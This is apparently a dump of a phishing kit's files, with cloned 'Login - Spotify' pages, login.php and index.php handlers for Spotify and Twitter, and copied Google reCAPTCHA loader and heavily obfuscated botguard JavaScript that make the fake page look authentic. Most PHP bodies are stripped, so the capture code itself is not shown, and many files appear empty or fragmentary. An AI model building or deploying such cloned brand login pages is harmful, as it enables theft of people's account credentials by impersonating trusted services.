-------------------------------------------------------------------------------- /sites/spotify/api.js: -------------------------------------------------------------------------------- 1 | /* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function() {var CFG='___grecaptcha_cfg';if(!window[CFG]){window[CFG]={};}var GR='grecaptcha';if(!window[GR]){window[GR]={};}window[GR].ready=window[GR].ready||function(f){(window[CFG]['fns']=window[CFG]['fns']||[]).push(f);};(window[CFG]['render']=window[CFG]['render']||[]).push('explicit');window['__google_recaptcha_client']=true;var po=document.createElement('script');po.type='text/javascript';po.async=true;po.src='https://www.gstatic.com/recaptcha/api2/v1528855115741/recaptcha__en.js';var elem=document.querySelector('script[nonce]');var n=elem&&(elem['nonce']||elem.getAttribute('nonce'));if(n){po.setAttribute('nonce',n);}var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(po, s);})(); -------------------------------------------------------------------------------- /sites/spotify/bframe.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | reCAPTCHA 6 | 177 | 178 | 179 | 182 | 183 |
-------------------------------------------------------------------------------- /sites/spotify/hVpKLs9k787xwHAhrfSZCIqM1XtnPD1dxAE7zC2jvTU.js: -------------------------------------------------------------------------------- 1 | /* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t */ Function('var R=this,b=function(A,m,q,D){(D=(q=A.J(),A).J(),c)(A,D,F(A.c(q),m))},p=function(A,m,q,D,E){for(E=(((A.g=((A.D=0,A).G=[],A.b=25,A.H=false,false),A.N=function(A,m,q){return(q=function(){return A},m=function(){return q()},m)[this.l]=function(W){A=W},m},A.s=function(A,m,q,D,E,H){return H=(D=function(){return D[q.V+(E[q.O]===m)-!H[q.O]]},E=function(){return D()},q=this,q).S,E[q.l]=function(A){D[q.I]=A},E[q.l](A),A=E},D=[],A).w=void 0,A.B=0,A).C=void 0,0);128>E;E++)D[E]=String.fromCharCode(E);((((E=((((((((((((((((((A.f=[],f(A,196,0),f)(A,58,0),f)(A,246,[160,0,0]),A.KB=function(A,m){((m.push(A[0]<<24|A[1]<<16|A[2]<<8|A[3]),m).push(A[4]<<24|A[5]<<16|A[6]<<8|A[7]),m).push(A[8]<<24|A[9]<<16|A[10]<<8|A[11])},f)(A,83,function(A,m,q){m=(m=A.J(),q=A.J(),A).c(m),f(A,q,Y(m))}),f)(A,73,function(A){z(A,1)}),f(A,141,function(A,m,q){m=(q=(m=A.J(),A).J(),A.f[m]&&A.c(m)),f(A,q,m)}),A.M=false,f(A,11,R),f)(A,169,function(A,m,q,D,E,H,y,w,d,n,V,t,k){for(n=d=(y=(E=(D=(m=A.J(),q=0),function(m,W){for(;D>=(D-=m,W=q&(1<=m.length;)m.push(A.J());D=m[D]}W.push(D)}A.C=A.s(k.slice(),A.J),A.w=A.s(W,A.J)})}),f(A,47,function(A){A.X(4)}),f)(A,99,T(4)),f(A,15,0),f)(A,172,function(A,m,q,D,E){for(E=(D=(q=(m=A.J(),N)(A),[]),0);E>q)}),f(A,95,function(A,m){(m=A.J(),A=A.c(m),A[0]).removeEventListener(A[1],A[2],false)}),f)(A,214,0),f(A,45,function(A,m,q,D){(q=(m=A.J(),A).J(),D=A.J(),f)(A,D,A.c(m)||A.c(q))}),f(A,242,function(A,m,q){S(A,1,5)||(m=A.J(),q=A.J(),f(A,q,function(A){return eval(A)}(A.c(m))))}),A.K=[],m)&&"!"==m.charAt(0)?(A.U=m,E()):(q=!!q.Y,A.M=q,A.m=[],C(A,[4,m]),C(A,[5,E]),O(A,false,q,true))},Y=function(A,m,q){if("object"==(m=typeof A,m))if(A){if(A instanceof Array)return"array";if(A instanceof Object)return m;if("[object Window]"==(q=Object.prototype.toString.call(A),q))return"object";if("[object Array]"==q||"number"==typeof A.length&&"undefined"!=typeof A.splice&&"undefined"!=typeof A.propertyIsEnumerable&&!A.propertyIsEnumerable("splice"))return"array";if("[object Function]"==q||"undefined"!=typeof A.call&&"undefined"!=typeof A.propertyIsEnumerable&&!A.propertyIsEnumerable("call"))return"function"}else return"null";else if("function"==m&&"undefined"==typeof A.call)return"object";return m},c=function(A,m,q,D,E,W){for(((E=A.c(m),99==m)?(m=function(A,m,q,D){if(q=(m=E.length,m)-4>>3,E.R!=q){q=((D=(E.R=q,[0,0,0,W]),q)<<3)-4;try{E.P=v(u(E,q),u(E,q+4),D)}catch(H){throw H;}}E.push(E.P[m&7]^A)},W=A.c(214)):m=function(A){E.push(A)},D)&&m(D&255),A=q.length,D=0;DA.F()-A.o)return false;return 0!=document.hidden?false:true},B=function(A,m){try{p(this,A,m)}catch(q){K(this,q)}},f=(B.prototype.O="caller",B.prototype.V=35,function(A,m,q){if(196==m||58==m)if(A.f[m])A.f[m][A.l](q);else A.f[m]=A.N(q);else if(246!=m&&99!=m&&2!=m&&213!=m||!A.f[m])A.f[m]=A.s(q,A.c);15==m&&(A.a=void 0,f(A,196,A.c(196)+4))}),a=(B.prototype.i=function(A,m,q,D,E,W){if(this.U)return this.U;try{W=[],E=[],D=!!A,C(this,[1,D,E,m]),C(this,[2,A,E,W]),O(this,false,D,true),q=W[0]}catch(g){K(this,g),q=this.U,A&&A(q)}return q},function(A,m){((A.j.push(A.f.slice()),A).f[196]=void 0,f)(A,196,m)}),X,C=function(A,m){A.K.splice(0,0,m)},u=function(A,m){return A[m]<<24|A[m+1]<<16|A[m+2]<<8|A[m+3]},F=((B.prototype.Bg=function(A,m,q,D){for(;q--;)196!=q&&58!=q&&m.f[q]&&(m.f[q]=m[D](m[A](q),this));m[A]=this},B.prototype).l="toString",function(A,m,q,D){for(q=[],D=m-1;0<=D;D--)q[m-1-D]=A>>8*D&255;return q}),v=function(A,m,q,D){try{for(D=0;101513633568!=D;)A+=(m<<4^m>>>5)+m^D+q[D&3],D+=3172301049,m+=(A<<4^A>>>5)+A^D+q[D>>>11&3];return[A>>>24,A>>16&255,A>>8&255,A&255,m>>>24,m>>16&255,m>>8&255,m&255]}catch(E){throw E;}},I=(B.prototype.cg=R.requestIdleCallback?function(A){requestIdleCallback(A,{timeout:4})}:R.setImmediate?function(A){setImmediate(A)}:function(A){setTimeout(A,0)},function(A,m,q){return q=A.c(196),A.m&&q>D&255);return q},B).prototype.v={},B).prototype.SX=function(A,m,q,D,E){for(E=D=0;E>6;return D=(A=(D+=D<<3,D^=D>>11,D+(D<<15)>>>0),new Number(A&(1<>>m)%q,D},function(A,m,q,D,E){for(;A.K.length;){if(q&&m&&L(A)){E=A,A.cg(function(){O(E,false,m,false)});break}D=(q=true,A).K.pop(),D=h(A,D)}return D}),r=function(A,m,q,D,E,W){return function(){var g=[6,m,q,void 0,E,W,arguments],Q=D&1;if(D&2)var P=(C(A,g),O(A,true,false,false));else Q&&A.K.length?C(A,g):Q?(C(A,g),O(A,true,false,false)):P=h(A,g);return P}},S=(B.prototype.F=(window.performance||{}).now?function(){return this.Je+(window.performance.now()|0)}:function(){return+new Date},function(A,m,q){if(0>=A.D||1E?m[q++]=E:(2048>E?m[q++]=E>>6|192:(55296==(E&64512)&&D+1>18|240,m[q++]=E>>12&63|128):m[q++]=E>>12|224,m[q++]=E>>6&63|128),m[q++]=E&63|128);return m},U=(B.prototype.X=function(A,m,q,D){(q=(A&=(m=A&4,3),this).J(),D=this.J(),q=this.c(q),m&&(q=M((""+q).replace(/\\r\\n/g,"\\n"))),A)&&c(this,D,F(q.length,2)),c(this,D,q)},function(A,m,q,D,E,W){for(((q=(m={},A).J(),m).W=A.J(),m).L=[],D=A.J()-1,E=A.J(),W=0;W>>q)}catch(E){throw E;}},function(A,m){return m=A.J(),m&128&&(m=m&127|A.J()<<7),m}),T=function(A,m){for(m=[];A--;)m.push(255*Math.random()|0);return m},K=function(A,m){A.U=("E:"+m.message+":"+m.stack).slice(0,2048)},O=(B.prototype.I=36,function(A,m,q,D,E,W){if(0==A.K.length)return W;if(E=0==A.B)A.o=A.F();return(W=G(A,q,D),E)&&(q=A.F()-A.o,q<(m?10:0)||0>=A.b--||A.G.push(254>=q?q:254)),W}),h=(B.prototype.Z=false,function(A,m,q,D,E){if(1==(q=(A.g=false,m)[0],q))A.b=25,A.S(m);else if(2==q){D=m[3],q=m[1];try{A.M=false,E=A.S(m)}catch(W){K(A,W),E=A.U}(q&&q(E),D).push(E)}else if(3==q)A.S(m);else if(4==q)A.S(m);else if(5==q)m=m[1],A.M=false,m();else if(6==q)return E=m[2],f(A,148,m[6]),f(A,211,E),A.S(m)}),x=(B.prototype.S=function(A,m,q,D,E){if(4==(m=A[0],m)){A=A[1];try{for(D=(A=(q=atob(A),[]),m=0);D>=8),A[m++]=E;this.m=A}catch(W){J(this,17,W)}Z(this)}else if(1==m)E=A[1],q=A[2],q.push(this.c(246).length,this.c(99).length,this.c(2).length,this.c(116)),this.M=E,f(this,211,A[3]),this.f[171]&&I(this,this.c(171));else{if(2==m){if(((E=(4<((4<(m=(E=(A=F((q=A[2],this.c(246).length+2),2),this).c(213),0>17,m^m<<5)&q)||(m=1),m)},function(A,m){((m=A.c(196)-m,f)(A,196,A.m.length),A.K).push([3,m])}),J=function(A,m,q,D,E){(q=(0==((m=[(E=A.c(58),m),E>>8&255,E&255],void 0)!=D&&m.push(D),A.c(213)).length&&(A.f[213]=void 0,f(A,213,m)),D="",q&&(q.message&&(D+=q.message),q.stack&&(D+=":"+q.stack)),A).c(116),3)q;q++)m[q]+=A[q];for(q=(A=[13,8,13,12,16,5,3,10,15],0);9>q;q++)m[3](m,q%3,A[q])}},B.prototype.J=function(A,m){if(this.C)return A=A?this.C().shift():this.w().shift(),this.C().length||this.w().length||(this.w=this.C=void 0,this.B--),A;if(!((A=this.c(196),A)in this.m))throw J(this,31),this.v;return((void 0==this.a&&(this.a=u(this.m,A-4),this.$=void 0),this.$!=A>>3&&(this.$=A>>3,m=[0,0,0,this.c(15)],this.A=v(this.a,this.$,m)),f)(this,196,A+1),this.m)[A]^this.A[A%8]},B.prototype.c=function(A,m){if(m=this.f[A],void 0===m)throw J(this,30,0,A),this.v;return m()},X=R.botguard||(R.botguard={}),X.EKc=function(A,m,q){(q=new B(A,{Y:m}),this).invoke=function(A,m,W){return(W=q.i(m&&A,W),A&&!m)&&A(W),W}},X.bg=function(A,m,q){return A&&A.substring&&(q=X[A.substring(0,3)])?new q(A.substring(3),m):new X.EKc(A,m)};try{X.u||(R.addEventListener("unload",function(){},e),X.u=1)}catch(A){}try{R.addEventListener("test",null,Object.defineProperty({},"passive",{get:function(){e={passive:true}}}))}catch(A){};')(); -------------------------------------------------------------------------------- /sites/spotify/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/spotify/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Login - Spotify 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 |
-------------------------------------------------------------------------------- /sites/spotify/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/twitter/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/twitter/login.php: -------------------------------------------------------------------------------- 1 | --------------------------------------------------------------------------------